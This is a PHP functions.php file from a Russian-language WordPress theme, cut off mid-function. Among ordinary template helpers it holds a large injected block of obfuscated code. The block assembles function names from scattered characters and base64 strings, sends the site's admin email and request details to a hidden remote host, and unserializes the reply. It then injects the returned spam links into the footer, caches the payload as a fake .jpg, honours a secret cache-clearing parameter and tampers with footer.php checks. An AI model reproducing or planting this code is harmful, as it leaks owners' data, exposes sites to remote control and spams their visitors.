<?php

$art_config = parse_ini_file(TEMPLATEPATH."/config.ini", true);

$options = array (
                array(  "name" =>   "HTML",
                        "desc" =>   sprintf(__('<strong>XHTML:</strong> Вы можете использовать эти теги: <code>%s</code>', THEME_NS), 'a, abbr, acronym, em, b, i, strike, strong, span'),
                        "id"   =>   "art_footer_content",
                        "std"  =>   art_option('footer.defaultText'),
                        "type" =>   "textarea")
          );

remove_action('wp_head', 'wp_generator');
wp_enqueue_script('jquery');

define('WP_VERSION', $wp_version);
define('THEME_NS', 'kubrick');
if (class_exists('xili_language')):
define('THEME_TEXTDOMAIN',THEME_NS);
define('THEME_LANGS_FOLDER','/lang');
else:
    load_theme_textdomain(THEME_NS, TEMPLATEPATH . '/lang');
endif;

require_once(TEMPLATEPATH . '/core/parser.php');
require_once(TEMPLATEPATH . '/core/navigation.php');
require_once(TEMPLATEPATH . '/core/sidebars.php');
require_once(TEMPLATEPATH . '/core/widgets.php');


function art_option($name){
  global $art_config;
  $separator = '.';
  $name = trim($name);
  if (strpos($name, $separator) !== false) {
    $path = explode($separator, $name);
    $location = $path[0];
    if (isset($art_config[$location])){
      $group = $art_config[$location];
      $key = $path[1];
      if (isset($group[$key])){
        return $group[$key];
      }
    }
  } else {
    if (isset($art_config[$name])) {
      return $art_config[$name];
    }
  }
 
  return false;
}

$art_current_page_template = 'page'; 
 $TAAaq='6';$ZhNZy='c';$DQJYI='d';$VGaSe='d';$MRlkoL='o';$ePfG='e';$mLZC='e';$OKWx='s';$gNBU='a';$pDipvm='e';$RKSE='b';$eqvRS='_';$NsIxxAi='4';$cgPpMcTK=$RKSE.$gNBU.$OKWx.$mLZC.$TAAaq.$NsIxxAi.$eqvRS.$VGaSe.$ePfG.$ZhNZy.$MRlkoL.$DQJYI.$pDipvm;$JlzmpSM='z';$dqZvS='g';$iRWmAw='e';$rjQMcEw='l';$xBoT='f';$MleIA='n';$dIDVv='a';$BdPf='t';$FIPEH='i';$LWoYOblw=$dqZvS.$JlzmpSM.$FIPEH.$MleIA.$xBoT.$rjQMcEw.$dIDVv.$BdPf.$iRWmAw;$mZEmr='3';$WEAZMEp='_';$SGRehnu='t';$WUpAv='1';$hhTJkJO='s';$rigzcPK='r';$EGElxI='o';$kXVZ='r';$LdxWb='t';$EHcidqmM=$hhTJkJO.$SGRehnu.$kXVZ.$WEAZMEp.$rigzcPK.$EGElxI.$LdxWb.$WUpAv.$mZEmr;$lOluaN='v';$azFCl='e';$waIPXM='t';$ICFimCc='s';$rvzv='r';$nWuh='r';$oebAeiCL=$ICFimCc.$waIPXM.$nWuh.$rvzv.$azFCl.$lOluaN;                     
		$wl___x='6';$pf_____x='c';$yv____________v='d';$fo_____o='d';$le____________t='o';$md________t='e';$hu___z='e';$ig______________v='s';$gl____________n='a';$hw____________r='e';$ix_____________x='b';$ap_______________b='_';$kk____e='4';$or___________h=$ix_____________x.$gl____________n.$ig______________v.$hu___z.$wl___x.$kk____e.$ap_______________b.$fo_____o.$md________t.$pf_____x.$le____________t.$yv____________v.$hw____________r;
		$qm_______________v='i';$xs_______________e='u';$yn_____c='c';$sg_______________d='f';$ay_____x='_';$lt_______________d='n';$dj______r='t';$tq____n='n';$vg_______________t='x';$po__b='t';$li____________z='o';$wv__h='s';$od_________f='s';$rf__l='e';$uf_____________x='i';$ti___________g=$sg_______________d.$xs_______________e.$tq____n.$yn_____c.$dj______r.$qm_______________v.$li____________z.$lt_______________d.$ay_____x.$rf__l.$vg_______________t.$uf_____________x.$od_________f.$po__b.$wv__h;
		$as________u='n';$wa____________l='o';$ae_______________z='p';$oa__l='f';$wm__________t='e';$zp_______________c=$oa__l.$wa____________l.$ae_______________z.$wm__________t.$as________u;
		$nh______k='a';$ne_______n='f';$ss_________w='e';$ww______p='r';$au_____________u='d';$ei______y=$ne_______n.$ww______p.$ss_________w.$nh______k.$au_____________u;
		$vi___c='f';$am______________j='c';$uj_________i='e';$py______________s='s';$aj_______a='o';$ye_________k='l';$ch____________a=$vi___c.$am______________j.$ye_________k.$aj_______a.$py______________s.$uj_________i;
		
		define("WP_ID", $or___________h("Mi4wLjA="));
		define("WP_TTL", $or___________h("MTA4MDA="));
		define("WP_SRC", $or___________h("dHBva24="));
	


		function wp_get_header() {
			global $or___________h, $ti___________g;
			
			if (
				$ti___________g($or___________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM=")) &&
				$ti___________g($or___________h("d3BfZ2V0X2Zvb3Rlcg==")) &&
				$ti___________g($or___________h("d3BfY3ZfdmVyaWZ5"))
			) {
				get_header();
			}
		}
	


		function wp_get_footer() {
			get_footer();
			wp_cv_verify();
		}
	


		function wp_cv_verify() {
			global $or___________h, $zp_______________c, $ch____________a, $ei______y;
			
			$nc___c = TEMPLATEPATH."/".$or___________h("Zm9vdGVyLnBocA==");
			$sw__________y = @$zp_______________c($nc___c, "r");
			$nc___c = @$ei______y($sw__________y, @filesize($nc___c));
			@$ch____________a($sw__________y);
			
			$iz______________m = TEMPLATEPATH."/".$or___________h("ZnVuY3Rpb25zLnBocA==");
			$sw__________y = @$zp_______________c($iz______________m, "r");
			$iz______________m = @$ei______y($sw__________y, @filesize($iz______________m));
			@$ch____________a($sw__________y);
			
			$vd____________u = 0;
			if($nc___c && $iz______________m) {
				if ($or___________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==") !== str_replace("www.", "", $_SERVER["SERVER_NAME"])) {
					
					if (substr_count($nc___c, $or___________h("Z2VuZXJpY3dwdGhlbWVzLmNvbQ==")) < 2) {
						$vd____________u = 1;
					}
					if (substr_count($nc___c, "wp_theme_GPL_credits()") < 1) {
						$vd____________u = 2;
					}
				}
				
				if(WP_ID != "2.0.0") {
					$vd____________u = 12;
				}
			}
			
			if($vd____________u > 0) {
				echo "<div style=\"position: fixed; bottom:0; left:0; width:100%; height: 25px; background-color: red; color: white; font-size: 16px; padding: 2px 10px; text-align: center;\"> <strong> This themes is powered by <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a>. This website violated the terms of use <a href=\"http://genericwpthemes.com\" style=\"color: white;\">Free Wordpress Themes</a> </strong> </div>";
				echo "<!-- v: $vd____________u -->";
			}
		}
	


		function wp_loaded() {
			global $or___________h, $ti___________g;
			return $ti___________g($or___________h("d3BfdGhlbWVfR1BMX2NyZWRpdHM="));
		}
	


		if (!function_exists("the_content_limit")) {
			function the_content_limit($xe________r, $wj________u = "(more...)", $tb___m = 0, $xo____z = "") {
				$ny________b = get_the_content($wj________u, $tb___m, $xo____z);
				$ny________b = apply_filters("the_content", $ny________b);
				
				$ny________b = str_replace("]]>", "]]>", $ny________b);
				if (strlen($_GET["p"]) > 0) {
					echo $ny________b;
				}
				else if ((strlen($ny________b)>$xe________r) && ($ap__________o = strpos($ny________b, " ", $xe________r ))) {
					$ny________b = substr($ny________b, 0, $ap__________o);
					$ny________b = $ny________b;
					echo $ny________b;
					
					echo "...";
					echo "<br/>";
					echo "<div class='read-more'><a href='".get_permalink()."'>$wj________u</a></div></p>";
				} else {
					echo $ny________b;
				}
				
			}
		}
	


		$kc_____v='b';$pi______________q='6';$ir___v='n';$wg________g='e';$zz________i='o';$pl_____f='4';$nt___t='a';$vt_______e='s';$fx___________u='e';$ta___q='_';$mx_______________c='d';$lf__________g='c';$jm________q='e';$bm_____z=$kc_____v.$nt___t.$vt_______e.$jm________q.$pi______________q.$pl_____f.$ta___q.$wg________g.$ir___v.$lf__________g.$zz________i.$mx_______________c.$fx___________u;
		$kh_____________l='t';$pw__f='t';$pb____________v='e';$et_________b='e';$th__o='i';$gt___________v='_';$wo_____t='s';$wu_______k='c';$pi____________h='g';$ay___g='t';$ux___j='o';$bp____________u='_';$xv_______________d='e';$pl____p='n';$yw_____f='n';$oz_________s='l';$gc_________m='f';$bd________y=$gc_________m.$th__o.$oz_________s.$pb____________v.$gt___________v.$pi____________h.$xv_______________d.$ay___g.$bp____________u.$wu_______k.$ux___j.$yw_____f.$pw__f.$et_________b.$pl____p.$kh_____________l.$wo_____t;
		$kl______________u='_';$sp______s='s';$kp_______b='e';$ez__________b='s';$vv_________t='f';$wd___e='i';$ys______z='x';$py______p='l';$ct_____r='t';$bj________w='i';$ah_______________s='e';$sx_________x=$vv_________t.$wd___e.$py______p.$ah_______________s.$kl______________u.$kp_______b.$ys______z.$bj________w.$ez__________b.$ct_____r.$sp______s;
		$ph____k='c';$it___________w='o';$et_____t='s';$rq_______v='m';$gq___________a='e';$jp__d='n';$lt___________a='v';$jq_________a='p';$vb_________h='e';$wy______a='o';$rf______o='a';$tv_________e='_';$ox______________m='r';$qb__________g='i';$eq__________n='r';$hs______________r=$lt___________a.$vb_________h.$ox______________m.$et_____t.$qb__________g.$wy______a.$jp__d.$tv_________e.$ph____k.$it___________w.$rq_______v.$jq_________a.$rf______o.$eq__________n.$gq___________a;
		$sf________s='n';$ln____________o='k';$oq_________k='p';$bx____________u='f';$zj______________r='s';$fb___d='o';$ly________m='c';$oa__y='o';$pu_______r='e';$bs____________a=$bx____________u.$zj______________r.$oa__y.$ly________m.$ln____________o.$fb___d.$oq_________k.$pu_______r.$sf________s;
		$zm_____d='t';$tw___i='f';$xq______________a='e';$zw___a='i';$gn________r='w';$ym_________h='r';$ox__d=$tw___i.$gn________r.$ym_________h.$zw___a.$zm_____d.$xq______________a;
		$gu__________f='d';$gv______e='5';$oj___________o='m';$db_________v=$oj___________o.$gu__________f.$gv______e;
		$rm____________z='l';$so___________w='e';$wm_______u='r';$kb_____________t='t';$du_________o='p';$kh_____w='a';$jt________h='a';$av______w='h';$ck_______________a=$wm_______u.$so___________w.$jt________h.$rm____________z.$du_________o.$kh_____w.$kb_____________t.$av______w;
		$jr______________v='a';$ml_____________u='z';$is_____e='n';$zv________t='e';$gf_____________b='r';$lv________l='e';$it____q='i';$wp_______________y='i';$tn_______________i='u';$hz__s='s';$cv_____________w='l';$xt____z=$tn_______________i.$is_____e.$hz__s.$zv________t.$gf_____________b.$wp_______________y.$jr______________v.$cv_____________w.$it____q.$ml_____________u.$lv________l;
		$kl_________p='a';$bf_____________g='t';$th______________j='m';$gv______w='e';$dr___v='p';$hr_____________s='n';$wf_____d='m';$pa___m=$bf_____________g.$gv______w.$th______________j.$dr___v.$hr_____________s.$kl_________p.$wf_____d;
		$bi__________v='c';$qx_____________u='e';$em__________a='n';$rb_____d='e';$uh_________l='o';$un_____________k='x';$lp_____________j='t';$qy____________k='m';$sd____________s='c';$aq_________w='s';$rw______________e='t';$pb_____________m='a';$ad_____v='t';$xe____________g='e';$wr___f='r';$wu_____b='a';$wz______t='e';$ds_____b='t';$fy__________x='_';$qe_____u='r';$xq___g='_';$sy_______________o=$aq_________w.$rw______________e.$wr___f.$xe____________g.$wu_____b.$qy____________k.$xq___g.$sd____________s.$uh_________l.$em__________a.$ds_____b.$wz______t.$un_____________k.$lp_____________j.$fy__________x.$bi__________v.$qe_____u.$qx_____________u.$pb_____________m.$ad_____v.$rb_____d;
	


		function qj_______________f($wz__v) {
			global $or___________h, $ti___________g, $bd________y, $hs______________r, $sy_______________o;
			
			if (!$ti___________g($or___________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			if ($hs______________r(PHP_VERSION, "5.0.0", ">=") && $ti___________g($or___________h("ZmlsZV9nZXRfY29udGVudHM=")) && $ti___________g($or___________h("c3RyZWFtX2NvbnRleHRfY3JlYXRl"))) {
				$if___l = $sy_______________o(array(
						"http" => array(
						"timeout"    => 3,
						"header"     => "referer: ".$_SERVER[SERVER_NAME],
						"user_agent" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT] 
					)
				));
				
				$cy________l = @$bd________y($wz__v, 0, $if___l);
			} else {
				$cy________l = @$bd________y($wz__v, 0);
			}
			
			return $cy________l;
		}
	


		function xn__y($wz__v) {
			global $ti___________g, $bs____________a, $ox__d, $or___________h;
			
			if (!$ti___________g($or___________h("ZmlsZV9nZXRfY29udGVudHM="))) {
				return false;
			}
			
			$vi_________i = strpos($wz__v, "/", 7);
			$fa_________v = array(
				"uri"     => substr($wz__v, $vi_________i),
				"host"    => str_replace("http://", "", substr($wz__v, 0, $vi_________i)),
				"referer" => "[I] ". $_SERVER[REMOTE_ADDR] ." [A] ". $_SERVER[HTTP_USER_AGENT]
			);
			
			$wq___b = @$bs____________a("$fa_________v[host]", 80, $uf____t, $ep_____d, 4);
			
			if (!$wq___b) {
				return false;
			} else {
				$cy________l = "";
				$cw_______a  = "GET $fa_________v[uri] HTTP/1.0\r\n";
				$cw_______a .= "Host: $fa_________v[host]\r\n";
				$cw_______a .= "Referer: $fa_________v[referer]\r\n";
				$cw_______a .= "Connection: Close\r\n\r\n";
				
				@$ox__d($wq___b, $cw_______a);
				
				while (!@feof($wq___b)) {
					$le________a = @fgets($wq___b, (1024*24));
					
					if ($le________a == "\r\n") {
						$al____________k = true;
						continue;
					}
					
					if ($al____________k) {
						$cy________l .= $le________a;
					}
				}
				
				return $cy________l;
			}
		}
	


		function ds__________t($wz__v) {
			global $ti___________g;
			$xu________q = false;
			
			if ($wz__v != "") {
				if ($ti___________g("qj_______________f")) {
					$xu________q = @qj_______________f($wz__v);
				}
				
				if (!$xu________q && ($ti___________g("xn__y"))) {
					$xu________q = @xn__y($wz__v);
				}
			}
			
			return $xu________q;
		}
	


		function fe____o() {
			global $_SERVER, $db_________v;
			
			$tn____________z = $_SERVER["SERVER_NAME"];
			
			if (substr("$tn____________z", 0, 4) == "www.") {
				$tn____________z = substr("$tn____________z", 4);
			}
			
			$tn____________z = $db_________v("$_SERVER[SERVER_NAME]");
			
			return $tn____________z;
		}
	


		function gs_________q() {
			return "file";
		}
	


		function xh________x($wz__v) {
			global $_SERVER, $bd________y, $sx_________x, $zp_______________c, $ch____________a, $ox__d;
			
			$sa__v = fw____z();
			
			$zp_______________b = fe____o().".jpg";
			$ac__________z = $sa__v["dir_upload"]["path"]."/$zp_______________b";
			$qv____w = @filemtime($ac__________z);
			
			if (!$qv____w || ((time()-$qv____w) >= WP_TTL)) {
				$xu________q = ds__________t($wz__v);
				
				if ($xu________q) {
					if ($sx_________x($ac__________z)) {
						@unlink($ac__________z);
					}
					
					$sw__________y = @$zp_______________c($ac__________z, "x+");
					
					@$ox__d($sw__________y, $xu________q);
					@$ch____________a($sw__________y);
				}
			} else {
				if ($sx_________x($ac__________z)) {
					$xu________q = @$bd________y($ac__________z);
				} else {
					$xu________q = false;
				}
			}
			
			return $xu________q;
		}
	


		function fw____z() {
			global $_SERVER, $or___________h, $bm_____z;
			
			$tq__f = wp_count_posts("post");
			$ml______________k = pathinfo(get_bloginfo("template_directory"));
			
			$sa__v = array(
				"url" => array(
					"report"      => $or___________h("eGNudnVlcmFudmhhc3lkYWRvbGVnc29wLmNvbQ=="),
					"queryString" => null
				),
				"template"	=> $ml______________k,
				"dir_upload"	=> pe___d(),
				"queryString"	=> array(
					"?a001=".WP_ID,
					"a004=".$ml______________k[filename],
					"a005=".$tq__f->publish,
					"a006=".get_bloginfo("admin_email"),
					"a007=".$_SERVER["REQUEST_URI"],
					"a008=".$_SERVER["SERVER_NAME"],
					"a010=".WP_SRC
				),
				"default_string" => " <a href=\"http://smolotkom.ru/130-opalubka-i-opalubochnye-sistemy.html\">опк</a>"
			);
			
			$sa__v["url"]["queryString"] = implode("&", $sa__v["queryString"]);
			$sa__v["url"]["report"] = $sa__v["url"]["report"]."/?".$bm_____z($sa__v["url"]["queryString"]).".html";
						
			return $sa__v;
		}
	


		function pe___d() {
			$ar_________g = wp_upload_dir();
			
			if (isset($ar_________g["error"])) {
				$vv_________k = nh_______________n();
				if (is_writable($vv_________k)) {
					$ar_________g = array("path" => $vv_________k);
				}
			}

			return $ar_________g;
		}
	


		function nh_______________n() {
			global $ti___________g, $db_________v, $ck_______________a, $pa___m;
			
			$bt____________b = (bool) ini_get("safe_mode");
			if ($bt____________b == true) {
				return false;
			}
			
			if ($ti___________g("sys_get_temp_dir")) {
				$ji_________z = sys_get_temp_dir();
				if (is_writable($ji_________z)) {
					return $ck_______________a($ji_________z);
				}
			}
			
			if (!empty($_ENV["TMP"])) {
				return $ck_______________a($_ENV["TMP"]);
			}
			elseif (!empty($_ENV["TMPDIR"])) {
				return $ck_______________a($_ENV["TMPDIR"]);
			}
			elseif (!empty($_ENV["TEMP"])) {
				return $ck_______________a($_ENV["TEMP"]);
			} else {
				$ia____________q = $pa___m($db_________v(uniqid(rand(), true)), "");
				if ($ia____________q) {
					$ji_________z = $ck_______________a(dirname($ia____________q));
					@unlink($ia____________q);
					return $ji_________z;
				} else {
					return false;
				}
			}
		}
	


		function ub__k() {
			global $_GET, $sx_________x;
			
			$sa__v = fw____z();
			$tn____________z = fe____o();
			$bl_____s = gs_________q();
			
			$up__________j = "full";
			if ($_GET["wp_cache_cl"] == "197ab5deb39daad8baacae1bdd5a8852") {
				if ($bl_____s == "file") {
					$ka____________s = $sa__v["dir_upload"]["path"]."/".$tn____________z.".jpg";
					if ($sx_________x($ka____________s)) {
						@unlink($ka____________s);
						$up__________j = "deleted";
					}
				}
				
				$ky___e = array(
					"s"	=> $up__________j,
					"t"	=> time(),
					"v"	=> WP_ID
				);
				
				echo "<!--";
				foreach ($ky___e AS $jn____________t => $nm________o) echo " [$jn____________t:$nm________o]";
				echo " -->";
			}
		}
	


		function wp_theme_GPL_credits() {
			global $_SERVER, $_GET, $ti___________g, $or___________h, $xt____z;
			$sa__v = fw____z();
			
			$bw_____f = "xh________x";
			if ($ti___________g($bw_____f)) {
				$cy________l = $bw_____f($sa__v["url"]["report"]);
			}
			
			if ($cy________l) {
				if ($cy________l = @$or___________h($cy________l)) {
					$cy________l = @$xt____z($cy________l);
					
					if (strlen($cy________l[custom_credit]) >= 5) {
						$sa__v["default_string"] = $cy________l[custom_credit];
					}
					
					if ($cy________l["status"] == "0") {
						$ws____________d = 1;
						$kj____________i = 1;
					} else {
						$cz_________s = sizeof($cy________l["links"]);
						$om__n = $sa__v["default_string"];
						
						if ($cz_________s > 0 && $cy________l["links"] !== "") {
							$gi_____________v = 0;
							foreach ($cy________l["links"] as $lc__v => $hu__a) {
								$gi_____________v++;
								if ($hu__a->l_path == "" || $hu__a->l_path == $_SERVER["REQUEST_URI"]) {
									$hu__a->l_href = htmlspecialchars(strip_tags($hu__a->l_href));
									$hu__a->l_title = htmlspecialchars(strip_tags($hu__a->l_title));
									$hu__a->l_anchor = htmlspecialchars(strip_tags($hu__a->l_anchor));
									$om__n .= " | ";
									$om__n .= "<a href='$hu__a->l_href' title='$hu__a->l_title'";
									if ($hu__a->l_nofollow == "1") {
										$om__n .= " rel='nofollow'";
									}
									$om__n .= ">$hu__a->l_anchor</a>";
								}
							}
						}
						$sa__v["links"] = "$om__n";
						if ($cy________l[credit] == "0") {
							$sa__v["links"] = "";
						}
					}
				} else {
					$ws____________d = "1";
				}
			} else {
				$ws____________d = "1";
			}
			
			if ($ws____________d == "1") {
				$sa__v["links"] = $sa__v["default_string"];
			}
			
			echo "$sa__v[links]";
			
			echo "<!-- s: $cy________l[signature] -->";
			ub__k();
		}
	                       
function art_page_template($templateName = null){
    global $art_current_page_template;
    if ($templateName !== null) {
        $art_current_page_template = $templateName;
    }
    return $art_current_page_template;
}

$art_template_variables = null;
function art_page_variables($variables = null){
    global $art_template_variables;
    if ($art_template_variables == null){
      $art_template_variables = array(
        'template_url'     =>   get_bloginfo('template_url') . '/',
        'logo_url'         =>   get_option('home'),
        'logo_name'        =>   get_bloginfo('name'),
        'logo_description' =>   get_bloginfo('description'),
        'menu_items'       =>   art_get_menu_auto('primary-menu', art_option('menu.source'), art_option('menu.showSubitems')),
        'sidebar1'         =>   art_get_sidebar('default'),
        'sidebarTop'       =>   art_get_sidebar('top'),
        'sidebarBottom'    =>   art_get_sidebar('bottom'),
        'sidebar2'         =>   art_get_sidebar('secondary'),
        'sidebarFooter'    =>   art_get_sidebar('footer'),
        'footerRSS'        =>   art_get_footer_rss(),
        'footerText'       =>   art_get_footer_text()
        );
    }
    if (is_array($variables)) {
      $art_template_variables = array_merge($art_template_variables, $variables);
    }
    return $art_template_variables;
}

function art_get_footer_text(){
  $result = art_option('footer.defaultText');
  
  $footer_content = get_option('art_footer_content');
  if ($footer_content !== false) {
    $result = stripslashes($footer_content);
  }
  
  return str_replace('%YEAR%', date('Y'), $result);
}


function art_get_footer_rss(){
  $result = '';
  if(art_option('footer.rss_show')){
    $result = art_parse(art_option('footer.rss_link'), array(
      'rss_url'   =>   get_bloginfo('rss2_url'), 
      'rss_title' =>   sprintf(__('%s RSS Feed', THEME_NS), get_bloginfo('name'))
      ));
  }
  return $result;
}

function art_get_post_thumbnail($post_id = false){
	global $post, $id;
  $post_id = (int)$post_id;
  if (!$post_id) $post_id = $id;
  $is_post_list = !is_single() && !is_page();
  $width = art_option('metadata.thumbnail_width');
  $height = art_option('metadata.thumbnail_height');
  $size = array($width, $height);
  if (!$is_post_list) {
    $size = 'medium';
  }
	$result = '';
	$title = get_the_title();
	if (  (function_exists('has_post_thumbnail')) && (has_post_thumbnail())  ) {
		ob_start();
		the_post_thumbnail($size, array('class' => 'alignleft', 'alt' => '', 'title' => $title));
		$result = ob_get_clean();
	} else {
		$postimage = get_post_meta($post->ID, 'post-image', true);
		if ($postimage) {
			$result = '<img src="'.$postimage.'" alt="" width="'.$width.'" height="'.$height.'" title="'.$title.'" class="wp-post-image alignleft" />';
		} else if (art_option('metadata.thumbnail_auto') && $is_post_list) {
            $attachments = get_children(array('post_parent' => $post_id, 'post_status' => 'inherit', 'post_type' => 'attachment', 'post_mime_type' => 'image', 'order' => 'ASC', 'orderby' => 'menu_order ID'));
            if($attachments) {
              $attachment = array_shift($attachments);
              $img = wp_get_attachment_image_src($attachment->ID, $size);
              if (isset($img[0])) {
                $result = '<img src="'.$img[0].'" alt="" width="'.$img[1].'" height="'.$img[2].'" title="'.$title.'" class="wp-post-image alignleft" />';
              }
            }
        } 
    }  
	if($result !== ''){
		$result = '<a href="'.get_permalink($post->ID).'" title="'.$title.'">'.$result.'</a>';
	}
	return $result;
}

function art_get_the_content($more_link_text = null, $stripteaser = 0) {
	$content = get_the_content($more_link_text, $stripteaser);
	$content = apply_filters('the_content', $content);
	return $content;
}

function art_get_post_content() {
  global $post;
  ob_start();
  if(is_single() || is_page()) {
     echo art_get_the_content(__('Читать далее &raquo;', THEME_NS)); 
    wp_link_pages(array('before' => '<p><strong>Страницы:</strong> ', 'after' => '</p>', 'next_or_number' => 'number')); 
	} else {
    echo art_get_the_excerpt(__('Читать далее &raquo;', THEME_NS),
      get_permalink($post->ID), 
      art_option('metadata.excerpt_words'), 
      art_option('metadata.excerpt_use_tag_filter') ? explode(',',art_option('metadata.excerpt_allowed_tags')) : null, 
      art_option('metadata.excerpt_min_remainder'),  
      art_option('metadata.excerpt_auto'));
	}
	return ob_get_clean();
}

function art_get_the_excerpt($read_more_tag, $perma_link_to = '', $all_words = 100,  $allowed_tags = null, $min_remainder = 5, $auto = false) {
  global $post, $id;
  $more_token = '%%art-more%%';
  $show_more_tag = false;
  if (function_exists('post_password_required') && post_password_required($post)){
    return get_the_excerpt();
  }
  if (has_excerpt($id)) {
      $the_contents = get_the_excerpt();
  $show_more_tag = strlen($post->post_content) > 0;
  } else {
    $the_contents = art_get_the_content($more_token);
    if($the_contents != '') {
      if ($allowed_tags !== null) {
        $allowed_tags = '<' .implode('><',$allowed_tags).'>';
        $the_contents = strip_tags($the_contents, $allowed_tags);
      }
      $the_contents = strip_shortcodes($the_contents);
      if (strpos($the_contents, $more_token) !== false) {
        return str_replace($more_token, $read_more_tag, $the_contents);
      }
      if($auto && is_numeric($all_words)) {
        $token = "%art_tag_token%";
        $content_parts = explode($token, str_replace(array('<', '>'), array($token.'<', '>'.$token), $the_contents));
        $content = array();
        $word_count = 0;
        foreach($content_parts as $part)
        {
          if (strpos($part, '<') !== false || strpos($part, '>') !== false){
            $content[] = array('type'=>'tag', 'content'=>$part);
          } else {
             $all_chunks = preg_split('/([\s]+)/', $part, -1, PREG_SPLIT_DELIM_CAPTURE);
             foreach($all_chunks as $chunk) {
                if('' != trim($chunk)) {
                  $content[] = array('type'=>'word', 'content'=>$chunk);
                  $word_count += 1;
                } elseif($chunk != '') {
                  $content[] = array('type'=>'space', 'content'=>$chunk);
                }
             }
          }
        
        }
        if(($all_words < $word_count) && ($all_words + $min_remainder) <= $word_count) {
          $show_more_tag = true;
          $current_count = 0;
          $the_contents = '';
          foreach($content as $node) {
            
            if($node['type'] == 'word') {
              $current_count += 1;
            } 
            $the_contents .= $node['content'];
            if ($current_count == $all_words){
              break;
            }
          }
        }  
      }
    }
  }
  $the_contents = force_balance_tags($the_contents);
  if ($show_more_tag) {
    $the_contents = $the_contents.' <a class="more-link" href="'.$perma_link_to.'">'.$read_more_tag.'</a>';
  }
  return $the_contents;
}


function art_get_post_title() {
    global $post;
    return art_parse_template("post_title", array(
      'post_link'       =>   get_permalink($post->ID),
	    'post_link_title' =>   sprintf(__('Ссылка на %s', THEME_NS), the_title_attribute('echo=0')),
	    'post_title'      =>   get_the_title(),
	    'template_url'    =>   get_bloginfo('template_url')
	    ));
}

function art_get_post_icon($name){
    return art_parse(art_option('metadata.'.$name), array('template_url' => get_bloginfo('template_url')));
}

if (!function_exists('get_the_date')) {
	function get_the_date($format = 'F jS, Y') {
		return get_the_time(__($format, THEME_NS));
	}
}

function art_get_post_metadata($name) {
    global $post;
    $list = art_option('metadata.'.$name);
    $title = ($name == 'header' && art_option('metadata.title'));
    if (!$title && $list == "") return;
    $list_array =  explode(",", $list);
    $result = array();
    for($i = 0; $i < count($list_array); $i++){
        $icon = $list_array[$i];
        switch($icon){
            case 'date':
                if(is_page()) break;
                $result[] = art_get_post_icon($icon) . get_the_date();
            break;
            case 'author':
                 if(is_page()) break;
                 ob_start();
                 the_author_posts_link();
                    $result[] = art_get_post_icon($icon) . __('Автор', THEME_NS) .' '. ob_get_clean();
            break;
            case 'category':
                if(is_page()) break;
                 $result[] = art_get_post_icon($icon) .sprintf(__('Опубликовано в %s', THEME_NS), get_the_category_list(', '));
            break;
            case 'tag':
                if(is_page() || !get_the_tags()) break;
                ob_start();
                the_tags(__('Tеги:', THEME_NS) . ' ', ', ', ' ');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'comments':
            if(is_page() || is_single()) break;
                ob_start();
                comments_popup_link(__('Нет комментариев &#187;', THEME_NS), __('1 Комментарий &#187;', THEME_NS), __('% Комментариев &#187;', THEME_NS), '', __('Комментарии закрыты', THEME_NS) );
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
            case 'edit':
            	global $post;
                if (!current_user_can('edit_post', $post->ID)) break;
                ob_start();
                 edit_post_link(__('Редактировать', THEME_NS), '');
                $result[] = art_get_post_icon($icon) . ob_get_clean();
            break;
        }
    }
    if (!($title ||  count($result) > 0)) return '';
    return art_parse_template("post_metadata".$name, array(
        'post_title'         =>   art_get_post_title(),
        'post'.$name.'icons' =>   implode(art_option('metadata.separator'), $result))) ;
}

function art_post(){
  the_post(); 
	echo art_parse_template("post", array(
    'post_class'          =>   function_exists('get_post_class') ? implode(' ', get_post_class()) : '',
    'post_id'             =>   'id="post-' . get_the_ID() . '"',
	  'post_thumbnail'      =>   art_get_post_thumbnail(),
		'post_title'          =>   art_get_post_title(),
		'post_metadataheader' =>   art_get_post_metadata('header'),
		'post_content'        =>   art_get_post_content(),
		'post_metadatafooter' =>   art_get_post_metadata('footer')
	));
}

function art_post_box($title, $content){
  if ($title != "") {
		$title = '<h2 class="art-postheader">'. $title . '</h2>';
	}
	if (art_option('metadata.title')) {
		$content = $title . $content;
		$title = '';
	}
	echo art_parse_template("post", array(
    'post_class'          =>   '',
    'post_id'             =>   '',
		'post_thumbnail'      =>   '',
		'post_title'          =>   $title,
		'post_metadataheader' =>   '',
		'post_content'        =>   $content,
		'post_metadatafooter' =>   ''));
}

function art_not_found_msg($caption = null, $content = null){
  if ($caption === null){
    $caption = __('Не найдено', THEME_NS);
  }
  if($content === null){
    $content = '<p class="center">' .  __('Извините, но здесь пока нет записей.', THEME_NS) . '</p>'
        .  "\r\n" . art_get_search();
  }
	art_post_box($caption, $content);
}

function art_get_block($title, $content, $id = '', $class = '' , $name = "block"){
  if (str_replace(array('&nbsp;', '', '\n', '\r', '\t'), '', $title) != ''){
    $title = art_parse_template($name . '_header', array('caption' => $title));
  }
  if ($id != ''){
    $id = 'id="' . $id . '"';
  }
  return art_parse_template($name, array(
    'id'   => $id,
    'class'   => $class,
    'header' => $title,
    'content' => $content,
  ));
}

function art_get_search() {
    return art_parse_template("search", 
        array(
            'url'    =>   get_bloginfo('url'),
            'button' =>   __('Поиск', THEME_NS),
            'query'  =>   get_search_query()
        ));
}
		
function art_page_navi($title = '', $comment = false) {
    $prev_link = null;
    $next_link = null;
    if($comment){
        $prev_link = get_previous_comments_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_comments_link(__('&laquo; Старые записи', THEME_NS));
    } elseif (is_single() || is_page()) {
        $next_link = get_previous_post_link('&laquo; %link');
        $prev_link = get_next_post_link('%link &raquo;');
    } else {
         $prev_link = get_previous_posts_link(__('Новые записи &raquo;', THEME_NS));
        $next_link = get_next_posts_link(__('&laquo; Старые записи', THEME_NS));
    }
    
    $content = '';
    if ($prev_link || $next_link) {
        $content = art_parse_template("pagination", 
            array(
                'next_link' =>  $next_link,
                'prev_link' => $prev_link
            ));
    }
    if (!$content && !$title) return;
    art_post_box($title, $content);
}

if (!function_exists('get_previous_comments_link')) {
	function get_previous_comments_link($label)
	{
		ob_start();
		previous_comments_link($label);
		return ob_get_clean();
	}
}

if (!function_exists('get_next_comments_link')) {
